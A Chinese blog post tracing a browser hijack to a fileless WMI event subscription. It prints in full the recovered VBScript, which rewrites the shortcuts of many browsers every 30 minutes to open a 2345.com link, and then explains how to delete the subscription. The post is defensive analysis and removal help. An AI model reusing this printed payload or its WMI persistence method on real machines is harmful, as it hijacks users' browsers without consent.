Chrome被hao123.com等恶意链接劫持真正解决方法

最后发现，原来快速启动栏的快捷命令被其修改，修改后的类似如下：
“C:\Program Files (x86)\Mozilla Firefox\firefox.exe” http://www.2345.com/?kunown

于是认为就是普通的修改快捷方式，手工删除“http://www.2345.com/?kunown”部分。但好景不长，半小时后再次被更改了，这才认定——系统被蛀了~！

本机安装有norton，未检出问题。
又安装了超级兔子、360、exterminateit等工具进行检查，也未检出……，果断将其全部卸载……（超级兔子卸载后发现还留有其自带浏览器垃圾未删除！！！真够垃圾~！手工将其卸载，不多赘述！）

打开ProcessMonitor进行监视，发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令，然后自动关闭（幸亏是30分钟一次，你要是24小时一次，那我就杯具了……），修改win7下opera快速启动图标路径类似如下：
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet\Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk

查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。

要查看WMI事件，到以下地址下载WMITool并安装，
链接：http://pan.baidu.com/s/1hrO5T32 密码：s69f

安装后打开WMI event viewer，点击左上角regist er for events，弹出Connect to namespace框，填入“root\subscription”，(或者默认的那个进去/root/CIMV2)确定，出现下图：

点击左侧_EventFilter:Name=”unown_filter”，再至右侧右键点击ActiveScriptEventConsumer Name=”unown”，选择view instant properties，如下图：

查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“http://www.2345.com/?kunown”！抓住你了_{！隐藏的够深，没常驻进程，没有文件（把自己存储在WMI数据库中），靠}！

受到影响的浏览器有（各色浏览器，差不多齐了）：
“IEXPLORE.EXE”, “chrome.exe”, “firefox.exe”, “360chrome.exe”, “360SE.exe”, “SogouExplorer.exe”, “opera.exe”, “Safari.exe”, “Maxthon.exe”, “TTraveler.exe”, “TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”, “QQBrowser.exe”

具体代码如下：

On Error Resume Next:Const link = “http://www.2345.com/?kunown”:browsers = Array(“IEXPLORE.EXE”, “chrome.exe”, “firefox.exe”, “360chrome.exe”, “360SE.exe”, “SogouExplorer.exe”, “opera.exe”, “Safari.exe”, “Maxthon.exe”, “TTraveler.exe”, “TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”, “QQBrowser.exe”):Set oDic = CreateObject(“scripting.dictionary”):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject(“Scripting.Filesystemobject”):Set WshShell = CreateObject(“Wscript.Shell”):strDesktop = “C:\Users\Gemini\Desktop”:strAllUsersDesktop = WshShell.SpecialFolders(“AllUsersDesktop”):QuickLaunch = “C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch”:UserPinnedStartMenu = QuickLaunch & “\User Pinned\StartMenu”:UserPinnedTaskBar = QuickLaunch & “\User Pinned\TaskBar”:For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & “.” & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & “.” & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & “.” & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & “.” & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & “.” & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后，清除方法：在WMI event viewer中将“_EventFilter:Name=”unown_filter””项目右键删除！

删不掉？

到WMITool安装路径（例如：C:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！删之！

还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉！

暂时就这么多了，还有没有其它影响的话，用用再看吧！

嗯，好歹这苍蝇到底还是吐出去了！

Chrome被hao123.com等恶意链接劫持真正解决方法相关推荐

chrome主页被劫持的解决方法
chrome主页被劫持的解决方法参考文章: (1)chrome主页被劫持的解决方法 (2)https://www.cnblogs.com/wyh-hde/p/6747867.html 备忘一下.
chrome无法拖拽离线安装CRX格式插件解决方法
chrome无法拖拽离线安装CRX格式插件解决方法参考文章: (1)chrome无法拖拽离线安装CRX格式插件解决方法 (2)https://www.cnblogs.com/TianyuSu/p/1 ...
chrome浏览器提示Adobe Flash Player未安装的解决方法
chrome浏览器提示Adobe Flash Player未安装的解决方法参考文章: (1)chrome浏览器提示Adobe Flash Player未安装的解决方法 (2)https://ww ...
磊科路由器dns服务器老要修复,路由器DNS劫持的解决方法
网速明显变慢,以前能浏览的网页现在访问出错了,这是怎么回事呢?这极有可能你家里的路由器的DNS劫持了!下面是学习啦小编给大家整理的一些有关路由器DNS劫持的解决方法,希望对大家有帮助! 路由器DNS劫 ...
Chrome 删除不干净导致无法再次安装的解决方法
Chrome 删除不干净导致无法再次安装的解决方法因为业务需求要用到selenium,并且要用到旧版的谷歌浏览器.卸载没有卸载干净,导致无法重新安装(安装包无反应).找了很久找到真正有用的解决方法. ...
王者荣耀体验服服务器注册上限怎么办,王者荣耀体验服资格8月6日申请地址 2018体验服申请恶意值过高解决方法...
王者荣耀体验服资格8月6日申请地址体验服申请恶意值过高解决方法,王者荣耀体验服(白名单)即将于2018年08月6日上午11:00开启资格申请!各位千万不要着急,先确保自己有资格就可以! 体验服可以体 ...
关于 Chrome插件安装时程序包无效:CRX_HEADER_INVALID 的解决方法
关于 Chrome插件安装时程序包无效:"CRX_HEADER_INVALID" 的解决方法打开chorme的扩展程序(设置-->更多工具-->扩展程序)chrome ...
Chrome浏览器被2345、hao123等网站劫持的解决方法
万恶的垃圾劫持,今天升级win10之后被劫持了本来想写个方法了,发现有人解决了,自己看吧一分钟解决Chrome浏览器主页被hao123.360和2345篡改简单有效方法_2385804990的博客 ...
win10 hao123劫持html文件,Win10 edge主页被hao123劫持如何解决|edge主页被hao123劫持的解决方法...
Windows10系统自带的edge浏览器功能十分强大,不过有时也会出现一些错误.比如,最近小编发现Edge浏览器的首页被修改成hao123了,通过浏览器设置界面设置后还是没用.经过一番研究,系统城小 ...

Chrome被hao123.com等恶意链接劫持真正解决方法

Chrome被hao123.com等恶意链接劫持真正解决方法相关推荐

最新文章

热门文章